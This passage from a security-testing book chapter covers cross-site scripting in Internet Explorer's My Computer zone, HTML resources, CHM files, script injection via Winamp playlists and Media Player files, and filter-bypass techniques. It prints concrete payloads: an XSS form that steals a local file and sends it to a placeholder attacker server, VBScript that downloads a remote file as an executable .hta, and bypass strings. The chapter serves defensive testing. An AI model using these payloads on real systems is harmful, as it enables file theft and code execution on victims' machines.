To steal the contents of C:SecretPlans.txt, an attacker can echo an HTML form and script through a page containing the reflected XSS flaw. The attacker-supplied script will fill out the form using the contents of C:SecretPlans.txt and will automatically submit the form to the attacker’s server. The resulting form and script will look something like this:

<FORM action="http://AttackersServer/redir.asp" name="myForm" method="POST">
  <INPUT type="hidden" name="txtSecretText" id="idText">
</FORM>
<SCRIPT>
  var x=window.open('file://c:/SecretPlans.txt','myWindow'),
  while (x.document.readyState !='complete') ;
  idText.Value=x.document.body.innerText;
  x.close();
  idText.submit();
</SCRIPT>

To exploit the localHello.html example to copy the contents of C:SecretPlans.txt from the victim’s hard drive to the attacker’s Web server, the attacker must coerce the victim to browse to the following URL:

C:XSSDemoslocalHello.html#<FORM action=“http://AttaclersServer/redir.asp” name=“myForm” method=“POST”><INPUT type=“hidden” name=“txtSecretText” id=“idText”></FORM><SCRIPT>var x=window.open(‘file://c:/SecretPlans.txt’,‘myWindow’);while (x.document.readyState !=‘complete’);idText.Value=x.document.body.innerText; x.close();idText.submit();</SCRIPT>

Tip

Depending on the security settings, Internet Explorer might display the Information bar warning the user that active content has been restricted. For this demonstration, you can click the Information bar and select to allow the blocked content. As you’ll see in the section titled Understanding How Internet Explorer Mitigates XSS Attacks Against Local Files later in this chapter, this restriction doesn’t always exist, and attackers have ways of working around it when it does exist.

Internet Explorer zones

Internet Explorer loads content in one of the following zones (listed from most restrictive to least restrictive):

Restricted Sites. This is the most restrictive zone in terms of security. Restricted Sites contains URLs the user chooses by using the browser’s security user interface. No sites are in this zone by default. You can think of Restricted Zones as a black list of sites. Some features prohibited in this zone include HTML script, ActiveX controls, automatic sending of credentials, and the ability to download files.
Internet. Sites on the Internet are in this zone. Sites in this zone are allowed to run HTML script, ActiveX controls, and to download files. Automatic sending of credentials isn’t allowed.
Intranet. Sites on the user’s local network are in this zone. Automatic sending of credentials is allowed in this zone.
Trusted Sites. Sites loaded in this zone are determined by the Trusted Sites list. This list is empty by default, but the user can add URLs to this list and this zone by using the security user interface (similar to the Restricted Sites user interface). This zone is for sites to which the user wants to give more permissions than allowed by the security zone the site would normally run in.
My Computer. Also known as the Local Machine Zone. Pages loaded in this zone come from the local hard disk. This zone contains the least amount of security protection. This zone allows any content on the hard disk to be read and can be used to execute arbitrary code (by taking advantage of ActiveX controls).

Important

In Microsoft Windows XP Service Pack 2 (SP2), a more restrictive version of the My Computer zone is introduced. This new version locks down the My Computer zone and doesn’t allow script or ActiveX controls to run. In Windows XP SP2 and later, there are two versions of the My Computer zone—the original version and the more restrictive version. This is discussed in the section titled Changes in Internet Explorer in Windows XP SP2 later in this chapter.

Using Local XSS Bugs to Run Binaries on the Victim’s Machine

Another fun thing about the My Computer zone is that several ActiveX controls normally blocked from the Internet can be called. Developers of these controls sometimes allow potentially dangerous functionality when the Web page calling the control is in the My Computer zone because they believe only trusted code should be in this zone. In theory, this is correct, but with a single local XSS or local script injection bug an attacker can call into the control.

Microsoft added additional restrictions to some controls that allowed dangerous behavior when called from the My Computer zone because once an attacker could run script in the My Computer zone these controls were being used to run arbitrary code on a victim’s machine. One of these controls is Shell.Application, which contains an Open method that takes a parameter named vDir. The vDir parameter can be the path to an executable file such as an .exe file. When the Open method is invoked, the executable specified in vDir is launched.

More Info

ActiveX controls called from HTML pose another set of security problems not discussed in this chapter. For more details and a more in-depth look at the ActiveX technology see Chapter 18.

At the time of this writing, the ADODB.Connection controls (when hosted in the My Computer Zone) can be used to write files to arbitrary files on the local hard disk. A person named Http-equiv wrote code similar to the following script that downloads http://www.example.com/remoteFile.txt and writes the contents locally as C:localFile.hta (HTA files are HTML applications that have no security restrictions; HTA files should be regarded as similar to running EXE files):

<script language="vbs">
'http://www.malware.com - 19.10.04
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.example.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from remoteFile.txt", conn
rs.Save "C:\localFile.hta", adPersistXML
rs.close
conn.close
</script>

The HTA could be placed in the location of the attacker’s choice. Placing it in the victim’s startup group would result in execution next time the victim logs on. More on Http-equiv’s code is available in his mail to the Full-Disclosure mailing list (see http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027778.html).

HTML Resources

Binary files can contain resources. Commonly used resources are bitmaps, cursors, dialog boxes, HTML, and string tables. HTMLResExample.dll, included on this book’s companion Web site, is an example that contains an HTML resource. HTML resources can contain XSS bugs.

Programs usually call the LoadResource Windows API to retrieve the content of a resource. This API cannot be called through HTML script. The Windows operating system has a res pluggable protocol used to load HTML resources in Internet Explorer from arbitrary files. To read a resource from a file using the res protocol, the following syntax is used:

res://fileName[/resourceType]/resourceID.

The resourceType is optional; the default is type 23 (HTML). For example, the HTML resource named dnserror.htm in shdoclc.dll is displayed by visiting res://C:WindowsSystem32shdoclc.dll/dnserror.htm. You’ve probably seen this resource before; it is used by Internet Explorer when your browser encounters a DNS error. The bitmap resource named 533 in the same file can be viewed through res://C:WindowsSystem32shdoclc.dll/2/533, as shown in Figure 10-11. The full path to the resource file isn’t required if it is located in the current path. For example, the bitmap resource in shdoclc.dll can also be loaded with the URL res://shdoclc.dll/2/533.

Figure 10-11. A bitmap resource located in shdoclc.dll displayed in Internet Explorer by using the res protocol

It turns out that HTML specified in resources can also be exploited by attackers and should be tested for local XSS attacks. The root cause of the vulnerability in the case of resources is identical to the problem exhibited in HTML files on the local file system. The only difference is how the buggy HTML file is accessed: instead of the attacker getting the victim to browse directly to an HTML file that contains an XSS bug on the local hard file system, the attacker gets the victim to load an HTML resource that contains an XSS bug through the res pluggable protocol.

Finding HTML Resources in Files

Many tools can be used to examine resources contained in binary files on the Windows platform. If you don’t already have a program to examine resources, you can download Resource Hacker (http://angusj.com/resourcehacker/), which is a freeware utility whose sole purpose is viewing and manipulating resources. Microsoft Visual Studio is one that might already be installed on your machine. Visual Studio shows HTML resources under the HTML folder, but other programs (such as Resource Hacker) might show HTML resources under a folder named 23 (which is the internal ID for HTML resources defined in winuser.h).

Example of Running Script Through HTML Resources

Examining HTML resource 102 inside HTMLResExample.dll shows that its HTML is identical to the HTML in the previous example (localHello.html) except that the HTML is contained in the DLL. Because a simple URL to run script through localHello.html was file://D:/XSSDemos/localHello.html#<SCRIPT>alert(“Hi!”)</SCRIPT>, a URL to run simple script through HTMLResExample.dll is res://D:/XSSDemos/HTMLResExample.dll/102#<SCRIPT>alert(“Hi!”)</SCRIPT>. Now code is running in the My Computer zone!

Compiled Help Files

Another type of file to test for local XSS bugs are Compiled Help Module (CHM) files, which end with the .chm extension. Compiled Help files are a set of HTML files bundled together in one CHM file. To examine the contents of a CHM for potential XSS bugs, dump its contents to disk. Microsoft has a free tool, called HTML Help Workshop, available from http://msdn.microsoft.com/library/en-us/htmlhelp/html/hwMicrosoftHTMLHelpDownloads.asp, that can be used either to create or decompile Compiled Help files. It can be used to decompile a CHM so that all of the individual files contained inside of the CHM are easy to examine.

Using HTML Help Workshop to Decompile a CHM File

After you start HTML Help Workshop, select the Decompile option on the File menu to extract the individual HTML files. In the dialog box that appears, enter the name of the CHM and the directory where the decompiled contents of the CHM file should be stored.

Note

Use the CHMDemo.chm file included on the companion Web site to experiment with decompiling a CHM file.

Example of XSS in a CHM File

Look at the source of the three files extracted from CHMDemo.chm. The file named index.html doesn’t seem very interesting because it contains only frames that point to the other two files. Look at SearchForm.html; this file is a little more interesting. It asks the user for a search term and has a Search button that contains an onclick event. When the button is clicked, the following script is executed:

parent.frames[1].location = "searchResults.htm#" + txtKey-
word.value;parent.frames[1].location.reload();

What can an attacker do with this? Although it might not immediately appear like there is anything interesting an attacker can do, notice that the pages are passing data to each other using the hash. The third and most interesting file contained in the CHM is searchResults.htm. This file contains the following HTML fragment:

var strKeyword = new String(location.hash);
strKeyword = strKeyword.substring(1);
document.open();
document.write ("<font face="Tahoma" size="2">");
if(location.hash == "") {
   document.write ("Please enter a search term on the left and click "Search".");
}
else {
   document.write ("Search results for &quot;");
   document.write (strKeyword);
   document.write ("&quot;<BR>No information about that topic.");
}

This page writes out the document.hash as long as it isn’t the empty string. There isn’t any validation, so it should be possible to send script as the hash and have it run in the My Computer zone. But how can an attacker construct a URL that points to searchResults.htm inside of the CHM?

Exploiting CHMs Using Protocol Handlers

Much like with HTML resources, there is a way to load a specific page of a CHM inside Internet Explorer by using a pluggable protocol. There are actually three pluggable protocols that provide this functionality: ms-its, its, and mk. The following are examples of how to run script through CHMDemo.chm using each pluggable protocol.

ms-its:c:xssCHMDemo.chm::/searchResults.htm#<SCRIPT>alert(‘Hi!’);</SCRIPT>
its:c:xssCHMDemo.chm::/searchResults.htm#<SCRIPT>alert(‘Hi!’);</SCRIPT>
mk:@MSITStore:C:XSSCHMDemo.chm::/searchResults.htm#<SCRIPT>alert(‘Hi!’);</SCRIPT>

Finding XSS Bugs in Client-Side Script

Unlike the examples in the beginning of this chapter, the HTML isn’t being generated on the server and displayed on the client. The output is being generated on the client and the input data will not appear in the HTML source. How can these bugs be found? The previous approach of looking for the input in the HTML source returned and trying to figure out how to get script run won’t work. It is necessary to review the client-side script. Client-side script mostly appears inside <script> tags or is files included by using the src property on the <script> tag. For example, <SCRIPT src=“http://www.example.com/common.js”></SCRIPT> includes the code in common.js as if it was contained in the calling HTML page. Client-side script can be included in many other places such as events on an HTML tag and HTML Styles, but the most common will be the <script> tag. By carefully looking at the client-side script, you will be able to identify XSS bugs in the code.

Note

It is important to note that client-side script generating output doesn’t only happen in files installed on the local hard disk. Web sites can also contain client-side script that dynamically generates output and therefore can also contain XSS bugs in this category. An XSS bug in client-side script contained in a Web site will not run in the My Computer zone but instead will run in the security context of the site that referenced the script. For example, if www.example.com contained the previous example file localHello.html in the site (http://www.example.com/localHello.html), an attacker could get the victim to run script by coercing the victim to browse to http://www.example.com/localHello.html#<SCRIPT>alert(‘Hi!’)</SCRIPT>. This example script isn’t terribly interesting because it simply tells the victim “Hi!” but it has access to anything example.com has access to through script.

Although it is very difficult to make a complete list of all dangerous code that leads to an XSS condition, Table 10-3 describes a few elements you must investigate carefully if they are present in client-side scripts.

Table 10-3. Suspicious Client-Side Script Elements

Property	Description
Reading location.hash	This property contains any data after the page’s URL following the hash mark (#). The data after the hash mark can be set to an arbitrary value.
Reading location.search	This property contains any data after the page’s URL following the question mark (?). The data after the question mark can be set to an arbitrary value.
Reading document.location/location.href	Entire URL of the page. This property includes the location.search and location.hash. If a URL is http://www.example.com/foo.html?abc#123, the document.location includes the entire URL. The problem is that programmers only expect URLs like http://www.example.com/foo.html. The programmer makes assumptions that the document.hash and document.search won’t be present or doesn’t realize that they could be included in the document.location. Programmers might think that the data following the last forward slash of the URL is the name of the page. This isn’t the case! Suppose there is a page containing script that dynamically redirects to another file inside a directory with the same name. For example, if the file was named test1.html, the redirection would be to test1/file.html. If the programmer of the page thought the last forward slash in the document.location was immediately before the name of the page and makes the redirection based on that logic, script can run. An attacker could force the victim to load C:uggy.html#javascript:alert(“Hi!”);/.html/. Then the victim would be redirected to javascript:alert(“Hi!”);///file.html and the attacker’s code would run.
Setting document.location	Resetting this property forces the browser to load a URL. If you can control this data, you might be able to get script run by navigating to a URL that begins with a scripting protocol like javascript:alert(“Hi!”);.
Setting outerHTML/innerHTML	These properties are used to rewrite parts of the DOM. If you can control the data that is being rewritten, you might be able to get script to run.
Setting href / src	If the page is dynamically setting the HREF of src of a tag, script can likely run by using a scripting protocol. The HREF and src are the common attributes, but scripting protocols apply to most places that accept a URL as a value.

Understanding Script Injection Attacks in the My Computer Zone

Script injection (persistent XSS) can also happen on the local hard disk. Many applications write files to the local hard disk with contents that could be specified by an attacker. Following are a few examples.

Example: Script Injection in Winamp Playlist

A security researcher who goes by the name DownBload found a script injection bug in Nullsoft Winamp versions 2.76 and 2.79 and posted the details to Bugtraq (http://www.securityfocus.com/bid/5407). Recent versions of Winamp include a fix for this bug. DownBload found that Winamp didn’t validate or encode the MP3 file properties used in creating an HTML playlist. The HTML playlist is stored on the local hard disk, and Winamp automatically loads the file using the Internet Explorer rendering engine (Trident—discussed later in this chapter). Many people wouldn’t think that creating an HTML playlist through Winamp could compromise the local machine, but in this case it could.

How can you find bugs like this? The first step is understanding in a little more detail how the application works. If you create an HTML playlist of nonmalicious MP3 files, you will see that the artist and title information is displayed (see Figure 10-12).

Figure 10-12. Nullsoft Winamp displaying the artist and title information in a playlist

Likely the playlist displayed is HTML because it is created by an option named Generate HTML Playlist, but it is important to know whether Winamp is using Trident. Only Internet Explorer uses the concept of a My Computer zone. Remember, this zone has the lowest security settings. The Spy++ tool included with Visual Studio can be used to find out more information about the window displaying the playlist. Super Password Spy++ (http://www.codeguru.com/Cpp/I-N/ieprogram/security/article.php/c4387) is similar to the Visual Studio Spy++ and is freely available. Press Ctrl+F inside Spy++ to open the Find Window dialog box. This dialog box, shown in Figure 10-13, allows you to drag the Finder Tool over a window to obtain more information about it. Dragging the Finder Tool over the Winamp Playlist window shows the window’s class is Internet Explorer_Server. This is the window class used by Trident. Now you know Winamp is using the Internet Explorer rendering engine to display HTML.

Figure 10-13. The Find Window in Spy++

The artist and title information is part of the file properties for MP3 files. These properties can be modified in Windows Explorer by right-clicking a file and choosing Properties. Figure 10-14 shows that the artist’s name has been modified from “Artist” to “Artist <SCRIPT>alert(document.location)</SCRIPT>.”

Figure 10-14. The properties of an MP3, which can be modified in Windows Explorer

An attacker hopes that the artist property isn’t validated or encoded and included in the playlist. To test this theory, the newly modified MP3 with script as the artist can be loaded in Winamp and an HTML playlist can be generated. In this case, the theory proves true and the script runs successfully (Figure 10-15). The script contained code to echo the URL of the page it is running inside. In this case, the script displays the location as WHT16.tmp.html inside the temporary directory. Script running from this location means that it is running in the My Computer zone.

Figure 10-15. Script included in the MP3 file properties running in the My Computer zone when the HTML playlist is displayed

This example is a good one because it shows the importance of understanding where the data used to create HTML comes from. File properties of other formats are often used when creating an HTML page. Don’t just look for local files to contain HTML content when searching for local XSS and script injection attacks. Sometimes the HTML content is dynamically written by an application using the DOM. Often this HTML runs in the My Computer zone. If you are able to run script in a scenario like this, check the document.location to help determine in which zone your code is running.

Non-HTML Files Parsed as HTML

Internet Explorer has an interesting feature that has caused many security issues. Regardless of the extension and content type of a document, Internet Explorer examines the first 200 bytes of the document and makes its own decision on whether the content is HTML. If the browser sees content that appears to be HTML in the first 200 bytes, it parses the file as HTML. This has caused many security problems for applications writing files to the local hard disk on the Windows platform. When an application takes data from an untrusted source and places that data in the first 200 bytes of a file on the local hard disk, and the file location can be guessed by an attacker, there is the potential for a script injection bug in the My Computer zone. In Windows XP SP2 and later, Internet Explorer respects the Multipurpose Internet Mail Extensions (MIME) type and extensions of files and does not examine arbitrary files for HTML content. However, even on systems that have Windows XP SP2 installed, applications that host Trident might not exhibit the behavior of respecting MIME types.

More Info

For more information about the Internet Explorer sniffing behavior, see http://msdn.microsoft.com/library/default.asp?url=/workshop/networking/moniker/overview/mime_handling.asp. For more information about the change in Internet Explorer for Windows XP SP2 and later, see http://www.microsoft.com/windows/IE/community/columns/improvements.mspx.

To clarify, the following is an example of a Windows Media Player bug found by a security researcher named http-equiv. (The original message sent to Bugtraq can be found at http://www.securityfocus.com/bid/5543/.) Http-equiv found that Windows Media Player allowed an attacker to place an .asx file in a predictable location on the victim’s machine. Before the file was placed, some validation occurred on the file’s contents. Http-equiv found that he could pass the validation check by creating a valid .asx file, and then append arbitrary data to the end of it. A valid .asx file could be made with less than 200 bytes. This allowed him to place HTML data after the end of the valid .asx data. If Internet Explorer was asked to open the file, it would examine the first 200 bytes of the file, find HTML included, and render it as HTML in the My Computer zone. Because the file was placed in a predictable location, an attacker could easily place the file on the user’s hard disk and then redirect Internet Explorer to open the file. This bug has been fixed in more recent versions of Windows Media Player.

In this scenario, the attacker could place the file on the victim’s machine by using a Windows Media Player feature to install Windows Media Download Packages (http://www.microsoft.com/windows/windowsmedia/howto/articles/downpacks.aspx). A Windows Media Download Package is a compressed ZIP file that uses the .wmd extension. When a .wmd file is opened in Windows Media Player, some validation is performed on the contents; if the contents appear valid, the files are unzipped into a subdirectory inside the My Music directory on the user’s hard disk. The subdirectory name is the same as the name of the .wmd file.

Http-equiv’s example .asx file, contained in the .wmd file, took advantage of several other bugs to get his executable to run. For simplicity, this text focuses on how to get script running. An .asx file can be created as shown in the following code and can be placed, along with a music file (test.wma in this example), inside a ZIP file named demo.wmd (included on the companion Web site).

<ASX version="3">
<ENTRY>
  <REF HREF="test.wma" />
</ENTRY>
</ASX>
<IMG SRC="javascript:alert(document.location)">

This file passes as a valid .asx file and is unzipped on the victim’s machine in the directory named C:Documents and SettingsusernameMy DocumentsMy MusicVirtual Albumsdemo. Then, the victim needs to be redirected to the file and the .asx file will run script.

In the Windows Media Player example, people that knew about the Windows Media Download Packages functionality understood that the files placed inside the .wmd file would be extracted onto the user’s machine. However, finding script injection bugs where untrusted data is placed inside non-HTML files isn’t always as straightforward. We have found many bugs in locations where it wasn’t well known that untrusted data was being placed in non-HTML files. We found these bugs by using FileMon (discussed in Chapter 4) and by examining what is being written to the files.

Changes in Internet Explorer in Windows XP SP2

The Internet Explorer team looked carefully at how users were being attacked through Internet Explorer and the other applications hosting Trident (the Internet Explorer rendering engine). To better guard against attack the team changed the behavior of several features, and these changes are part of Windows XP SP2. For a full explanation of these changes, see http://download.microsoft.com/download/6/6/c/66c20c86-dcbe-4dde-bbf2-ab1fe9130a97/windows%20xp%20sp%202%20white%20paper.doc.

Many of the changes attempt to limit HTML scripting attacks, especially those occurring in the My Computer zone. The Internet Explorer team made some big changes to help thwart these attacks. Because many applications use the Internet Explorer rendering engine to display HTML content, the team needed to ensure that these applications weren’t broken by the security changes. To accomplish this, by default, only the Windows Explorer and Internet Explorer processes are affected by the security changes. Other processes can opt-in by setting registry keys for specific options. See http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2brows.mspx for the specifics of how these registry keys can be set.

If your application hosts Trident, you should investigate whether you can opt-in to the security changes. If you don’t opt-in, attackers might use your application as an attack vector when attempting to exploit a bug in another application.

Some of the larger security changes related to the browser in Windows XP SP2 include the following:

Locked-down My Computer zone. Because many HTML scripting attacks that compromised users occurred in the My Computer zone, Windows XP SP2 reduces or locks down functionality in the My Computer zone. Script and ActiveX controls are no longer allowed to run in this zone by default.
MIME sniffing. The behavior to automatically detect whether a document is an HTML file has been changed. In Windows XP SP2, Internet Explorer no longer sniffs the file to determine how the file should be interpreted.
Pop-up blocker. New browser windows that open through script or pop-up windows are prohibited. New windows can be opened when the user clicks a link.
Zone elevation blocks. Links and references for content from a less-secure zone to a more highly secure zone are prohibited or display a security warning. For example, a link from the Internet zone to the Intranet zone displays a security dialog box that warns the user of the security risk.

Important test cases related to the Windows XP SP2 changes

When testing your application, you should perform two important categories of tests related to these changes. First, if you are hosting Trident, opt-in to the more secure functionality. Test this by setting the registry keys to the more secure settings (as described at http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2brows.mspx) and use your application. Second, verify that your application’s security model is as tight as are the Internet Explorer changes in Windows XP SP2. Many times functionality similar to the browser functionality is implemented, and programmers use the security model of the browser as a guide for how their security should work. For example, allowing links from the Internet zone to the My Computer zone might have been allowed in the browser at the time the programmer introduced similar functionality into the product you are testing. In Windows XP SP2, links such as this are blocked. If your application doesn’t provide the same security protections, it might be used by an attacker as a way to work around some of the Windows XP SP2 mitigations. Issues like this are important to find and fix.

Ways Programmers Try to Prevent HTML Scripting Attacks

As discussed earlier, the most common way to attempt to stop HTML scripting attacks is to HTML-encode the user-supplied data. Also discussed were situations in which HTML encoding wouldn’t stop the attack. Programmers use many other methods to attempt to block HTML scripting attacks. The following sections discuss several different approaches, how each approach attempts to block the attack, and some ways attackers might bypass these attempts.

Filters

Filtering user input is a good idea. However, filters that attempt to block characters that are known to be bad usually fail. All an attacker needs to do to defeat such a filter is find one case that the programmer didn’t realize was bad, and then use that character in an attack. Filtering and only allowing known good characters (known as whitelisting) is always a better approach.

Some filters modify the user’s data before returning it. HTML encoding can be considered a form of filtering: the programmer specifically looks for such characters as angle brackets (<>), the ampersand (&), and quotation marks (”) and modifies them to their encoded equivalents. Other filters return an error and refuse to process the request if the input includes characters on the black list. Following are two examples of different types of filtering.

Removing Strings from Input Before Returning It

A few filters attempt to block script by removing the string “script.” Consider an application that returns the user’s data as the value of the src attribute of the <img> tag. Script could run by using a script protocol like javascript:. Sometimes programmers are also aware of this. In this case, the programmer attempts to block the HTML scripting attack by removing the strings “script” and “mocha” from the input before returning it. At first it appears the attack is blocked by the developer, but as a security tester you want to be persistent and think about this further because an attacker will. Can you find a way to bypass this filter? If programmers simply make a single pass through the input to remove the blacklisted strings and then return the data, they are in for a surprise.

Consider a string such as AAAscriptBBB. After it passes through the filter, the application returns AAABBB. Getting any ideas? What happens if the input is scriscriptpt? The substring script would be removed resulting in script! In the <img> tag example, attackers want to send in data that ends up being a scripting protocol; they could send in something like javascripscriptt:alert(‘Gotcha’) and end up with javascript:alert(‘Gotcha’), resulting in an XSS bug.

Blocking Breaking Out of an Attribute by Escaping

In many cases, user-supplied data is returned as the value of a string variable (see the section titled Stuck in a Script Block earlier in this chapter). The developer needs to make sure an attacker cannot get out of the string variable declaration. In a situation in which the returned data looks like the following, if attacker-controlled data is returned, the developer must ensure an attacker cannot close the single quotation marks around the user input:

<SCRIPT>
var strMyVar = 'user input goes here';
...more script appears here...
</SCRIPT>

Single quotation marks can be escaped using a backslash. For example, if the user input is it’s fun testing this app and the application correctly escapes the input, the following is returned:

<SCRIPT>
var strMyVar = 'it's fun testing this app';
...more script appears here...
</SCRIPT>

Sometimes programmers won’t think much past blocking the attacker from entering a single quotation mark to break out. The backslash that is added in the modified output can sometimes be escaped by the attacker’s input. Just as a backslash escapes a single quotation mark, a backslash can also escape another backslash (\ is treated as one backslash in the string variable). So if the attacker input is ’; alert(document.domain);// and the programmer doesn’t escape backslashes from the input, the following HTML would result:

<SCRIPT>
var strMyVar = '';alert(document.domain);//';
...more script appears here...
</SCRIPT>

This HTML runs script in the browser because the single quotation mark is no longer escaped.

Sometimes it’s hard to run meaningful code because of character limitations

In the example in which the developer attempts to block an attacker from breaking out of an attribute by escaping, every time a single quotation mark is used the returned data puts a backslash before it. Although it is possible to run script, it might be difficult to run the script the attacker desires. For example, if the data is also HTML encoded, the attacker is severely limited in which characters to use. It might seem difficult to even run script like alert(‘Hi’);, which would become alert(‘Hi’); and result in a syntax error.

The location.hash property discussed earlier isn’t sent to the server, but is accessible to script running on the page. Because it isn’t sent to the server it won’t be filtered by any server-side code. The location.hash property can be used to include characters that are normally modified by server-side filters. In the example, if the data was sent through the query string in a URL such as http://server/filter.asp?input=data, where data is filtered as discussed previously, attackers could insert their own <script> block that would not be affected by the filters with a URL like http://server/filter.asp?input= ’; document.open(); document.write(location.hash);document.close();//#<SCRIPT>alert(“Hi!”);</SCRIPT>.

Gaining In-Depth Understanding of the Browser’s Parser

In the preceding example in which data is returned as the value of a string variable inside a <script> block, surprisingly it isn’t necessary to close the single quotation marks. It turns out that the browser is looking for the </script> tag to close the <script> block. Then everything in between the <script> and </script> tags is treated as script and is checked for syntax errors. If programmers aren’t aware of this and think script can’t run without breaking out of the single quotation marks, they might not worry about filtering such characters as angle brackets. If an attacker sends in </SCRIPT><SCRIPT>alert(document.domain)</SCRIPT> as the input, the following would be returned:

<SCRIPT>
var strMyVar = '</SCRIPT><SCRIPT>alert(document.domain)</SCRIPT>';
...more script appears here...
</SCRIPT>

The browser would interpret this as two separate <script> blocks. The first one has syntax errors and won’t run any code, but the second one is syntactically correct. It will appear as <SCRIPT>alert(document.domain)</SCRIPT> and will run script successfully.

This is one example of how you and attackers can take advantage of browser idiosyncrasies. Some browsers have different nuances, so it is important to study each carefully.

Tip

Another little-known browser implementation detail is that Internet Explorer ignores NULL characters inside the HTML document, which allows <sc[null]ript> to be interpreted as <script>. Most filters looking for the <script> tag will not interpret <sc[null]ript> as <script> and will allow it to go through the filter.

Comments in Styles

In the section titled Using Styles earlier in this chapter, we demonstrated how to run script using a style expression. Some programmers are aware of this issue. They will specifically block styles that include the string expression. Styles support C-style comments anywhere within the style. For example, the following HTML includes a comment in the style:

<INPUT name="txtInput1" type="text" value="SomeValue" style=
"font-family:wingdings /* That funky Wingdings font will be used to display the text */">

Comments can be used to help bypass filters. In the example, the developer is looking for the string expression because it is used to run script through a style. Placing a comment in the middle of the word expression will bypass some filters. For example, the following HTML will run script and bypass a filter that is looking for expression:

<INPUT name="txtInput1" type="text" value=
"SomeValue" style="font-family:e/**/xpression(alert('Hi!'))">

Character Sets

The encoding and filter approaches generally take place on the server before it returns the user-supplied data to the client’s Web browser. A challenge of writing an effective server-side filter is enabling the server to recognize the data in the same way the client will. One way to bypass some server-side filters is by getting the server to interpret data using one encoding, but have the client use another. Consider the following sample ASP code (example charset.asp is included on the book’s companion Web site):

<HTML>
<HEAD><TITLE>XSS Charset Demo</TITLE></HEAD>
<BODY>
<% response.write Server.HTMLEncode(Request("Name")) %>
</BODY>
</HTML>

At first the code looks free of cross-site scripting security holes. The user-supplied data that is returned (the name parameter from the query string) is HTML encoded so an attacker can’t get <script> returned to the browser.

The goal of this test case is to send data to the server using an encoding/character set different from the one used by the server. If Unicode Transformation Format 7 (UTF-7) is used to represent the angle brackets, the URL will change from http://server/charset.asp?name=<SCRIPT>alert(document.domain)</SCRIPT> to http://server/charset.asp?name=%2B%41%44%77%2DSCRIPT%2B%41%44%34%2D%61%6C%65%72%74%28document.domain%29%3B%2B%41%44%77%2D%2FSCRIPT%2B%41%44%34%2D. Supplying this URL will not run script on the victim’s machine, however, unless the user’s browser interprets the page as UTF-7. Most users do not have the UTF-7 encoding selected specifically, although Internet Explorer has a feature that can automatically detect which encoding to apply to the page. This feature is not turned on by default but can be enabled; it is recommended that users who want multilanguage support enable this feature: in Internet Explorer, on the View menu, select Encoding, and then click Auto-Select.

With the Auto-Select feature enabled, the preceding UTF-7 data is returned from the Web server and is interpreted as the <script> tag—resulting in script running. This technique isn’t limited to UTF-7. You can typically find ways to bypass any filtering logic on the server any time the browser interprets data that uses an encoding or character set different from the one the server uses to filter it.

Internet Explorer will not auto-select the character set if the HTTP response specifies a character set in the Content-Type header or in the meta portion of the HTML returned. Opera and Netscape both support multiple character sets, but don’t seem to have the Auto-Select feature present in Internet Explorer.

Tip

RSnake maintains an extensive set of test cases for HTML script attacks on his Web site at http://ha.ckers.org/xss.html.

ASP.NET Built-in Filters

Microsoft ASP.NET 1.1 introduces a feature, named ValidateRequest, to help stop attacks from reaching vulnerable ASP.NET code; this feature is enabled by default. When the ValidateRequest property is enabled, the query string and POST data are inspected before being passed to the code contained in the ASP.NET page. If the data is suspicious, an exception is thrown. Some of the data that ValidateRequest perceives as suspicious include <script>, onload=, and style=. Figure 10-16 shows an example of an error page that ASP.NET displays if the server hasn’t disabled error messages or caught the exception.

This filter certainly blocks many attacks, but won’t stop everything. The bug in the ASP code still exists, but there is a road block preventing you from getting to the vulnerable code easily.

Figure 10-16. An ASP.NET exception, which is thrown if input that might lead to an HTML scripting attack is encountered

Important

Built-in filters such as the ASP.NET filter stop many attacks, but you should not rely on them exclusively to prevent HTML scripting bugs. It is still worth fixing flaws in code because the built-in filters will not prevent all attacks.

Understanding How Internet Explorer Mitigates XSS Attacks Against Local Files

Over the last few years, some features have been added to Internet Explorer, and the browser’s design has been changed to help prevent several attacks—including some XSS attacks.

Links from the Internet to the My Computer Zone Are Blocked

In Internet Explorer SP1 and later, the browser no longer allows pages in the Internet zone to link or redirect to the My Computer zone. If a page on the Internet contains a link to the My Computer zone, the link is displayed but is nonfunctional when clicked by the user. Other ways to redirect to the My Computer zone through Internet Explorer, such as setting a frame source, iframe, or redirecting the document’s location through script, are also blocked.

Can these changes completely prevent attackers from exploiting XSS and script injection bugs from the Internet? No way! Many components that Internet Explorer can call commonly are installed on users’ machines. These components aren’t always restricted from blocking links from the Internet to the My Computer zone. Two components that can be used at the time of this writing are the Macromedia Flash Player plug-in and the RealNetworks RealPlayer ActiveX control.

Flash contains a method named getURL that can be used to redirect the Web browser to an arbitrary URL. The Flash file (usually with the extension .swf) can be located on the Internet, can bypass the Internet Explorer restriction, and can redirect to URLs in the My Computer zone.

RealPlayer installs an ActiveX control (IERPCtl. IERPCtl) that contains the OpenURLInPlayerBrowser method, which takes a parameter of a URL as its first parameter. The second parameter can be used to specify in which window to open that URL. The value “_osdefaultbrowser” opens the URL inside the default browser, which often is Internet Explorer. (Opening the URL inside Internet Explorer isn’t needed because RealPlayer is hosting Trident.) The OpenURLInPlayerBrowser method can be called by a Web page on the Internet and can bypass the restriction imposed by Internet Explorer SP1 that prohibits links from the Internet to the My Computer zone.

Script Disabled in the My Computer Zone by Default

As demonstrated earlier, untrustworthy data enters the My Computer zone in many ways. For example, Trident can be hosted inside other programs. These applications often write their own HTML content to the local hard disk and then use Trident to render the file as HTML. The My Computer zone security was so loose because the content on the local hard disk usually is assumed to be safe. However, in Service Pack 2 for Windows XP, the My Computer zone behavior was modified to strengthen security and to help reduce local XSS and script injection attacks.

In Windows XP SP2, by default HTML script is disabled in the My Computer zone when the user views content using Internet Explorer. The user can choose to run script by clicking the Information bar, as shown in Figure 10-17. Because other applications might rely on the previously loose security of the My Computer zone, the tighter security imposed on Internet Explorer by SP2 is not imposed on other applications. This is a way to prevent breaking third-party applications when Windows XP users upgrade to SP2.

Figure 10-17. The Information bar, which is displayed to warn users about active content attempting to run on their computer

